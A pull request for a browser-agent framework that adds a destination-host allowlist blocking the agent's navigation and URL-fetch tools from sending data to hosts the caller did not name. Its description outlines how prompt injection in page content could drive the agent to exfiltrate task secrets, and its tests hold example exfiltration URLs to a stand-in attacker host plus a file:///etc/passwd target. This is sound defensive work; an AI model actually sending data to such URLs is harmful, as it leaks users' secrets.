### PR TITLE
TAB-1104: gate agent navigation + Tabstack URL tools through the action firewall

### DIFF
--- a/packages/core/schemas/webagent-event.json
+++ b/packages/core/schemas/webagent-event.json
@@ -4633,7 +4633,8 @@
         "kind": {
           "enum": [
             "freeform-fill",
-            "form-submission"
+            "form-submission",
+            "navigation"
           ],
           "type": "string"
         },

--- a/packages/core/src/events.ts
+++ b/packages/core/src/events.ts
@@ -403,7 +403,7 @@ export type FirewallRemediation =
 
 export interface FirewallBlockedNonInteractiveEventData extends WebAgentEventData {
   reason: string;
-  kind: "freeform-fill" | "form-submission";
+  kind: "freeform-fill" | "form-submission" | "navigation";
   pageHostname: string | null;
   formActionHostnames: string[];
   remediations: FirewallRemediation[];

--- a/packages/core/src/security/actionFirewall.ts
+++ b/packages/core/src/security/actionFirewall.ts
@@ -9,6 +9,9 @@ export const SECURITY_BLOCKED_UNAUTHORIZED_SUBMIT =
 export const SECURITY_BLOCKED_CROSS_SITE_OPERATIONAL_SUBMIT =
   "Security policy blocked submitting operational field data to a site other than the current page";
 
+export const SECURITY_BLOCKED_UNTRUSTED_NAVIGATION =
+  "Security policy blocked navigation to a host the caller did not name";
+
 export type FillSource = "agent" | "user-approved";
 
 export type ActionFirewallResult =
@@ -190,6 +193,40 @@ export function assessFormSubmission(input: {
   }
 
   return { allowed: true };
+}
+
+/**
+ * Gate agent-initiated navigation (goto) to the caller's trusted hosts.
+ *
+ * Navigation is an unconditional data-egress sink: the agent can place any value
+ * from its context (task text, caller data) into an outbound URL, and the request
+ * carries it to the destination host with no form and no approval. Detecting the
+ * secret inside the URL is unsound — it can be encoded or reshaped — so we gate
+ * the destination instead. A goto is allowed only to a host the caller named
+ * (the start host, folded in by withTrustedStartHost, or trusted_hostnames), or
+ * when the firewall is disabled via unsafe_mode.
+ *
+ * A null host (non-http(s) target: about:, file:, data:, javascript:, …) is
+ * never trusted, so it is blocked — failing closed.
+ */
+export function assessNavigation(input: {
+  targetUrl: string;
+  firewall: FirewallConfig;
+}): ActionFirewallResult {
+  if (input.firewall.unsafeMode) {
+    return { allowed: true };
+  }
+
+  const targetHost = extractHostname(input.targetUrl);
+  if (targetHost !== null && input.firewall.trustedHostnames.has(targetHost)) {
+    return { allowed: true };
+  }
+
+  return {
+    allowed: false,
+    reason: SECURITY_BLOCKED_UNTRUSTED_NAVIGATION,
+    isRecoverable: true,
+  };
 }
 
 function isOperationalField(field: FieldMetadata): boolean {

--- a/packages/core/src/security/firewallRemediations.ts
+++ b/packages/core/src/security/firewallRemediations.ts
@@ -1,0 +1,31 @@
+import type { FirewallRemediation } from "../events.js";
+
+/**
+ * Build the standard set of firewall-block remediations for a non-interactive
+ * block event. Shared by every tool that gates a risky action (fills, form
+ * submissions, navigation, and Tabstack URL fetches) so the guidance is
+ * identical across sinks.
+ */
+export function buildFirewallRemediations(blockedHostnames: string[]): FirewallRemediation[] {
+  const uniqueHosts = Array.from(new Set(blockedHostnames.filter((h): h is string => Boolean(h))));
+  return [
+    {
+      kind: "add-trusted-hostnames",
+      hostnames: uniqueHosts,
+      description:
+        uniqueHosts.length > 0
+          ? `Add ${uniqueHosts.join(", ")} to trusted_hostnames to allow this action on this site.`
+          : "Add the page hostname to trusted_hostnames to allow this action on this site.",
+    },
+    {
+      kind: "enable-interactive-mode",
+      description:
+        "Run in interactive mode by providing a UserDataCallback so the agent can ask the user to approve sensitive fields per-action via request_user_data.",
+    },
+    {
+      kind: "enable-unsafe-mode",
+      description:
+        "Set unsafe_mode=true to disable the action firewall entirely. WARNING: prompt injection from page content can then drive the agent to submit any field, including personal and credential data, to attacker-controlled forms.",
+    },
+  ];
+}

--- a/packages/core/src/tools/tabstackTools.ts
+++ b/packages/core/src/tools/tabstackTools.ts
@@ -13,10 +13,64 @@ import type Tabstack from "@tabstack/sdk";
 import { WebAgentEventEmitter, WebAgentEventType } from "../events.js";
 import { TOOL_STRINGS } from "../prompts.js";
 import { wrapExternalContentWithWarning, ExternalContentLabel } from "../utils/promptSecurity.js";
+import {
+  assessNavigation,
+  extractHostname,
+  type FirewallConfig,
+} from "../security/actionFirewall.js";
+import { buildFirewallRemediations } from "../security/firewallRemediations.js";
+import type { FirewallBlockedNonInteractiveEventData } from "../events.js";
 
 export interface TabstackToolContext {
   client: Tabstack;
   eventEmitter: WebAgentEventEmitter;
+  firewall: FirewallConfig;
+  interactive: boolean;
+}
+
+type TabstackBlockedResult = {
+  success: false;
+  action: string;
+  url: string;
+  error: string;
+  isRecoverable: true;
+};
+
+/**
+ * Gate a Tabstack fetch to the caller's trusted hosts. These tools fetch a
+ * model-supplied URL server-side, so they are a data-egress sink identical to
+ * `goto` and must pass the same destination allowlist (start host +
+ * trusted_hostnames, bypassed by unsafe_mode). Returns a blocked result to
+ * short-circuit the fetch, or null to proceed.
+ */
+function assessTabstackNavigation(
+  context: TabstackToolContext,
+  action: string,
+  url: string,
+): TabstackBlockedResult | null {
+  const assessment = assessNavigation({ targetUrl: url, firewall: context.firewall });
+  if (assessment.allowed) return null;
+
+  const host = extractHostname(url);
+  if (!context.interactive) {
+    const data: FirewallBlockedNonInteractiveEventData = {
+      timestamp: Date.now(),
+      iterationId: "",
+      reason: assessment.reason,
+      kind: "navigation",
+      pageHostname: host,
+      formActionHostnames: [],
+      remediations: buildFirewallRemediations(host ? [host] : []),
+    };
+    context.eventEmitter.emit(WebAgentEventType.FIREWALL_BLOCKED_NON_INTERACTIVE, data);
+  }
+  context.eventEmitter.emit(WebAgentEventType.BROWSER_ACTION_COMPLETED, {
+    success: false,
+    action,
+    error: assessment.reason,
+    isRecoverable: true,
+  });
+  return { success: false, action, url, error: assessment.reason, isRecoverable: true };
 }
 
 export function createTabstackTools(context: TabstackToolContext): ToolSet {
@@ -27,6 +81,9 @@ export function createTabstackTools(context: TabstackToolContext): ToolSet {
         url: z.string().url().describe(TOOL_STRINGS.tabstack.tabstack_extract_markdown.url),
       }),
       execute: async ({ url }) => {
+        const blocked = assessTabstackNavigation(context, "tabstack_extract_markdown", url);
+        if (blocked) return blocked;
+
         context.eventEmitter.emit(WebAgentEventType.AGENT_ACTION, {
           action: "tabstack_extract_markdown",
           value: url,
@@ -88,6 +145,9 @@ export function createTabstackTools(context: TabstackToolContext): ToolSet {
           .describe(TOOL_STRINGS.tabstack.tabstack_extract_json.json_schema),
       }),
       execute: async ({ url, json_schema }) => {
+        const blocked = assessTabstackNavigation(context, "tabstack_extract_json", url);
+        if (blocked) return blocked;
+
         context.eventEmitter.emit(WebAgentEventType.AGENT_ACTION, {
           action: "tabstack_extract_json",
           value: url,
@@ -143,6 +203,9 @@ export function createTabstackTools(context: TabstackToolContext): ToolSet {
           .describe(TOOL_STRINGS.tabstack.tabstack_generate_json.instructions),
       }),
       execute: async ({ url, json_schema, instructions }) => {
+        const blocked = assessTabstackNavigation(context, "tabstack_generate_json", url);
+        if (blocked) return blocked;
+
         context.eventEmitter.emit(WebAgentEventType.AGENT_ACTION, {
           action: "tabstack_generate_json",
           value: url,

--- a/packages/core/src/tools/webActionTools.ts
+++ b/packages/core/src/tools/webActionTools.ts
@@ -22,6 +22,7 @@ import { wrapExternalContentWithWarning, ExternalContentLabel } from "../utils/p
 import {
   assessFill,
   assessFormSubmission,
+  assessNavigation,
   extractHostname,
   type FirewallConfig,
 } from "../security/actionFirewall.js";
@@ -99,7 +100,7 @@ function buildRemediations(blockedHostnames: string[]): FirewallRemediation[] {
 
 function emitNonInteractiveBlock(
   context: WebActionContext,
-  kind: "freeform-fill" | "form-submission",
+  kind: "freeform-fill" | "form-submission" | "navigation",
   reason: string,
   pageHostname: string | null,
   formActionHostnames: string[],
@@ -519,6 +520,15 @@ export function createWebActionTools(context: WebActionContext): ToolSet {
         url: z.url().describe(TOOL_STRINGS.webActions.goto.url),
       }),
       execute: async ({ url }) => {
+        const assessment = assessNavigation({ targetUrl: url, firewall: context.firewall });
+        if (!assessment.allowed) {
+          // For a navigation block the relevant host is the target, so pass it
+          // as the remediation host (add it to trusted_hostnames to allow).
+          const targetHostname = extractHostname(url);
+          emitNonInteractiveBlock(context, "navigation", assessment.reason, targetHostname, []);
+          return failedActionResult(PageAction.Goto, assessment.reason, context, undefined, url);
+        }
+
         const result = await performActionWithValidation(PageAction.Goto, context, undefined, url);
 
         if (result.success) {

--- a/packages/core/src/tools/webActionTools.ts
+++ b/packages/core/src/tools/webActionTools.ts
@@ -26,7 +26,8 @@ import {
   extractHostname,
   type FirewallConfig,
 } from "../security/actionFirewall.js";
-import type { FirewallBlockedNonInteractiveEventData, FirewallRemediation } from "../events.js";
+import type { FirewallBlockedNonInteractiveEventData } from "../events.js";
+import { buildFirewallRemediations } from "../security/firewallRemediations.js";
 import {
   withSpan,
   SpanStatusCode,
@@ -74,30 +75,6 @@ type ActionResult = {
 
 const EMPTY_APPROVED_REFS = new Set<string>();
 
-function buildRemediations(blockedHostnames: string[]): FirewallRemediation[] {
-  const uniqueHosts = Array.from(new Set(blockedHostnames.filter((h): h is string => Boolean(h))));
-  return [
-    {
-      kind: "add-trusted-hostnames",
-      hostnames: uniqueHosts,
-      description:
-        uniqueHosts.length > 0
-          ? `Add ${uniqueHosts.join(", ")} to trusted_hostnames to allow this action on this site.`
-          : "Add the page hostname to trusted_hostnames to allow this action on this site.",
-    },
-    {
-      kind: "enable-interactive-mode",
-      description:
-        "Run in interactive mode by providing a UserDataCallback so the agent can ask the user to approve sensitive fields per-action via request_user_data.",
-    },
-    {
-      kind: "enable-unsafe-mode",
-      description:
-        "Set unsafe_mode=true to disable the action firewall entirely. WARNING: prompt injection from page content can then drive the agent to submit any field, including personal and credential data, to attacker-controlled forms.",
-    },
-  ];
-}
-
 function emitNonInteractiveBlock(
   context: WebActionContext,
   kind: "freeform-fill" | "form-submission" | "navigation",
@@ -115,7 +92,7 @@ function emitNonInteractiveBlock(
     kind,
     pageHostname,
     formActionHostnames,
-    remediations: buildRemediations(hostsForRemediation),
+    remediations: buildFirewallRemediations(hostsForRemediation),
   };
   context.eventEmitter.emit(WebAgentEventType.FIREWALL_BLOCKED_NON_INTERACTIVE, data);
 }

--- a/packages/core/src/webAgent.ts
+++ b/packages/core/src/webAgent.ts
@@ -588,6 +588,8 @@ export class WebAgent {
       ? createTabstackTools({
           client: createTabstackClient(this.tabstackApiKey, this.tabstackApiUrl),
           eventEmitter: this.eventEmitter,
+          firewall: withTrustedStartHost(this.firewall, this.callerStartHostUrl),
+          interactive: Boolean(this.onUserDataRequired),
         })
       : {};
 

--- a/packages/core/test/security/actionFirewall.test.ts
+++ b/packages/core/test/security/actionFirewall.test.ts
@@ -3,6 +3,7 @@ import type { FieldMetadata, FormSubmissionContext } from "../../src/browser/ari
 import {
   assessFill,
   assessFormSubmission,
+  assessNavigation,
   normalizeHostname,
   extractHostname,
   withTrustedStartHost,
@@ -10,6 +11,7 @@ import {
   SECURITY_BLOCKED_UNAUTHORIZED_FILL,
   SECURITY_BLOCKED_UNAUTHORIZED_SUBMIT,
   SECURITY_BLOCKED_CROSS_SITE_OPERATIONAL_SUBMIT,
+  SECURITY_BLOCKED_UNTRUSTED_NAVIGATION,
   type FirewallConfig,
 } from "../../src/security/actionFirewall.js";
 
@@ -182,6 +184,55 @@ describe("actionFirewall", () => {
       firewall: { trustedHostnames: new Set(), unsafeMode: false },
     });
 
+    expect(result.allowed).toBe(true);
+  });
+});
+
+describe("assessNavigation", () => {
+  const trusted = (hosts: string[]): FirewallConfig => ({
+    trustedHostnames: new Set(hosts),
+    unsafeMode: false,
+  });
+
+  it("allows navigation to a trusted host", () => {
+    const result = assessNavigation({
+      targetUrl: "https://trusted.example/path?q=1",
+      firewall: trusted(["trusted.example"]),
+    });
+    expect(result.allowed).toBe(true);
+  });
+
+  it("blocks navigation to a host the caller did not name", () => {
+    const result = assessNavigation({
+      targetUrl: "https://attacker.example/collect?code=CANARY-A1B2C3D9",
+      firewall: trusted(["trusted.example"]),
+    });
+    expect(result.allowed).toBe(false);
+    if (result.allowed) throw new Error("expected block");
+    expect(result.reason).toBe(SECURITY_BLOCKED_UNTRUSTED_NAVIGATION);
+    expect(result.isRecoverable).toBe(true);
+  });
+
+  it("allows any host when unsafe_mode is enabled", () => {
+    const result = assessNavigation({
+      targetUrl: "https://attacker.example/collect?code=CANARY-A1B2C3D9",
+      firewall: { trustedHostnames: new Set<string>(), unsafeMode: true },
+    });
+    expect(result.allowed).toBe(true);
+  });
+
+  it("blocks non-http(s) targets (null host), failing closed", () => {
+    for (const url of ["file:///etc/passwd", "about:blank", "data:text/html,hi"]) {
+      const result = assessNavigation({ targetUrl: url, firewall: trusted(["trusted.example"]) });
+      expect(result.allowed).toBe(false);
+    }
+  });
+
+  it("matches trusted hosts case-insensitively", () => {
+    const result = assessNavigation({
+      targetUrl: "https://Trusted.EXAMPLE/x",
+      firewall: trusted(["trusted.example"]),
+    });
     expect(result.allowed).toBe(true);
   });
 });

--- a/packages/core/test/tools/tabstackTools.test.ts
+++ b/packages/core/test/tools/tabstackTools.test.ts
@@ -1,5 +1,6 @@
 import { describe, it, expect, vi, beforeEach } from "vitest";
 import { createTabstackTools } from "../../src/tools/tabstackTools.js";
+import { SECURITY_BLOCKED_UNTRUSTED_NAVIGATION } from "../../src/security/actionFirewall.js";
 import { WebAgentEventEmitter, WebAgentEventType } from "../../src/events.js";
 import type Tabstack from "@tabstack/sdk";
 
@@ -43,7 +44,87 @@ describe("Tabstack Tools", () => {
     vi.clearAllMocks();
     mockClient = createMockClient();
     eventEmitter = new WebAgentEventEmitter();
-    tools = createTabstackTools({ client: mockClient, eventEmitter });
+    tools = createTabstackTools({
+      client: mockClient,
+      eventEmitter,
+      // unsafe_mode so the existing extraction tests below aren't gated by host.
+      firewall: { trustedHostnames: new Set<string>(), unsafeMode: true },
+      interactive: false,
+    });
+  });
+
+  describe("Firewall (destination allowlist)", () => {
+    const SECRET = "CANARY-A1B2C3D9";
+    function build(firewall: { trustedHostnames: Set<string>; unsafeMode: boolean }) {
+      const client = createMockClient();
+      (client.extract.markdown as any).mockResolvedValue({
+        url: "https://trusted.example/x",
+        content: "ok",
+        metadata: {},
+      });
+      (client.extract.json as any).mockResolvedValue({ ok: true });
+      (client.generate.json as any).mockResolvedValue({ ok: true });
+      return {
+        client,
+        tools: createTabstackTools({
+          client,
+          eventEmitter: new WebAgentEventEmitter(),
+          firewall,
+          interactive: false,
+        }),
+      };
+    }
+
+    it("blocks a Tabstack fetch to an untrusted host", async () => {
+      const { client, tools } = build({
+        trustedHostnames: new Set(["trusted.example"]),
+        unsafeMode: false,
+      });
+      const res: any = await tools.tabstack_extract_markdown.execute!(
+        { url: `https://attacker.example/collect?code=${SECRET}` },
+        toolCallOptions,
+      );
+      expect(res.success).toBe(false);
+      expect(res.error).toBe(SECURITY_BLOCKED_UNTRUSTED_NAVIGATION);
+      expect(client.extract.markdown).not.toHaveBeenCalled();
+    });
+
+    it("allows a Tabstack fetch to a trusted host", async () => {
+      const { client, tools } = build({
+        trustedHostnames: new Set(["trusted.example"]),
+        unsafeMode: false,
+      });
+      const res: any = await tools.tabstack_extract_markdown.execute!(
+        { url: "https://trusted.example/x" },
+        toolCallOptions,
+      );
+      expect(res.success).toBe(true);
+      expect(client.extract.markdown).toHaveBeenCalled();
+    });
+
+    it("allows any host in unsafe mode", async () => {
+      const { client, tools } = build({ trustedHostnames: new Set<string>(), unsafeMode: true });
+      const res: any = await tools.tabstack_extract_json.execute!(
+        { url: "https://attacker.example/x", json_schema: {} },
+        toolCallOptions,
+      );
+      expect(res.success).toBe(true);
+      expect(client.extract.json).toHaveBeenCalled();
+    });
+
+    it("blocks tabstack_generate_json to an untrusted host", async () => {
+      const { client, tools } = build({
+        trustedHostnames: new Set(["trusted.example"]),
+        unsafeMode: false,
+      });
+      const res: any = await tools.tabstack_generate_json.execute!(
+        { url: `https://attacker.example/x?code=${SECRET}`, json_schema: {}, instructions: "x" },
+        toolCallOptions,
+      );
+      expect(res.success).toBe(false);
+      expect(res.error).toBe(SECURITY_BLOCKED_UNTRUSTED_NAVIGATION);
+      expect(client.generate.json).not.toHaveBeenCalled();
+    });
   });
 
   describe("Tool Structure", () => {

--- a/packages/core/test/tools/webActionTools.test.ts
+++ b/packages/core/test/tools/webActionTools.test.ts
@@ -11,6 +11,7 @@ import { WebAgentEventEmitter, WebAgentEventType } from "../../src/events.js";
 import { LanguageModel } from "ai";
 import { z } from "zod";
 import { InvalidRefException, BrowserActionException } from "../../src/errors.js";
+import { SECURITY_BLOCKED_UNTRUSTED_NAVIGATION } from "../../src/security/actionFirewall.js";
 import { generateTextWithRetry } from "../../src/utils/retry.js";
 
 // Mock the ai module
@@ -708,7 +709,9 @@ describe("Web Action Tools", () => {
   });
 
   describe("Navigation Actions", () => {
-    it("should execute goto action successfully", async () => {
+    it("should execute goto action successfully to a trusted host", async () => {
+      context.firewall = { trustedHostnames: new Set(["newsite.com"]), unsafeMode: false };
+      tools = createWebActionTools(context);
       const performActionSpy = vi.spyOn(mockBrowser, "performAction");
       const emitSpy = vi.spyOn(eventEmitter, "emit");
 
@@ -725,6 +728,51 @@ describe("Web Action Tools", () => {
         title: expect.any(String),
         value: "https://newsite.com", // performActionWithValidation adds value field
       });
+    });
+
+    it("should block goto to a host the caller did not name", async () => {
+      // Default context trusts no hosts, so navigation off-allowlist is blocked.
+      const performActionSpy = vi.spyOn(mockBrowser, "performAction");
+      const emitSpy = vi.spyOn(eventEmitter, "emit");
+      const url = "https://attacker.example/collect?code=CANARY-A1B2C3D9";
+
+      const result = await tools.goto.execute({ url });
+
+      expect(result).toEqual({
+        success: false,
+        action: "goto",
+        value: url,
+        error: SECURITY_BLOCKED_UNTRUSTED_NAVIGATION,
+        isRecoverable: true,
+      });
+      // The browser must never navigate — the canary never leaves.
+      expect(performActionSpy).not.toHaveBeenCalled();
+      expect(emitSpy).toHaveBeenCalledWith(
+        WebAgentEventType.FIREWALL_BLOCKED_NON_INTERACTIVE,
+        expect.objectContaining({
+          kind: "navigation",
+          reason: SECURITY_BLOCKED_UNTRUSTED_NAVIGATION,
+        }),
+      );
+      expect(emitSpy).not.toHaveBeenCalledWith(
+        WebAgentEventType.BROWSER_NAVIGATED,
+        expect.anything(),
+      );
+    });
+
+    it("should allow goto to any host in unsafe mode", async () => {
+      context.firewall = { trustedHostnames: new Set<string>(), unsafeMode: true };
+      tools = createWebActionTools(context);
+      const performActionSpy = vi.spyOn(mockBrowser, "performAction");
+
+      const result = await tools.goto.execute({ url: "https://anywhere.example/x" });
+
+      expect(result.success).toBe(true);
+      expect(performActionSpy).toHaveBeenCalledWith(
+        "",
+        PageAction.Goto,
+        "https://anywhere.example/x",
+      );
     });
 
     it("should validate URL format for goto", () => {
@@ -1130,6 +1178,10 @@ describe("Web Action Tools", () => {
     });
 
     it("should handle errors in navigation actions", async () => {
+      // Trust the host so navigation passes the firewall and reaches the browser,
+      // where we simulate a navigation failure.
+      context.firewall = { trustedHostnames: new Set(["bad-site.com"]), unsafeMode: false };
+      tools = createWebActionTools(context);
       vi.spyOn(mockBrowser, "performAction").mockRejectedValueOnce(
         new BrowserActionException("goto", "Navigation failed"),
       );


### PR DESCRIPTION
The action firewall (TAB-976) gates form fill/submit but not URL egress. `goto` and the Tabstack extract/generate tools each take a model-controlled URL and send it out, so an injected page can exfiltrate the caller 's task/data secrets to an attacker host — no form, no approval.

## Change
- Add `assessNavigation(targetUrl, firewall)`: allow only a host the caller named (start host via `withTrustedStartHost` + `trusted_hostnames`), or when `unsafe_mode` is set. Non-http(s) targets (null host) are blocked (fail closed).
- Gate `goto` and `tabstack_extract_markdown` / `tabstack_extract_json` / `tabstack_generate_json` with it. Blocks return a recoverable error and emit `FIREWALL_BLOCKED_NON_INTERACTIVE` (kind `navigation`).
- Shared `buildFirewallRemediations` so every gated sink emits identical guidance.

Gating the destination host, not the URL contents, is deliberate: scanning the URL for the secret is a blocklist (encoding/param/method evade it). Denying the destination is independent of payload shape.

## Scope / severity
Prod's remote browser currently confines navigation to the start domain (BrightData `navigate_domains_limit`), so cross-domain exfil is not exploitable end-to-end today — but that is a third-party config, not a control we own. This makes the boundary explicit and portable (local browsers, other zones, future config changes). Not a P1 bleed; a real hardening.

## Tradeoff
Blocks the agent from following a link/search result to a host the caller did not name. Opt in via `trusted_hostnames` (exposed on /v1/automate, TAB-980) or `unsafe_mode` — same escape hatch as fill/submit.

## Testing
- `assessNavigation` unit tests (trusted/untrusted/unsafe/null-host/case).
- `goto` tool: blocks untrusted (no navigation, emits event), allows trusted + unsafe.
- Tabstack tools: block untrusted, allow trusted, unsafe bypass.
- Full suite: core 924, cli 229, server 103, extension 273; all typechecks pass.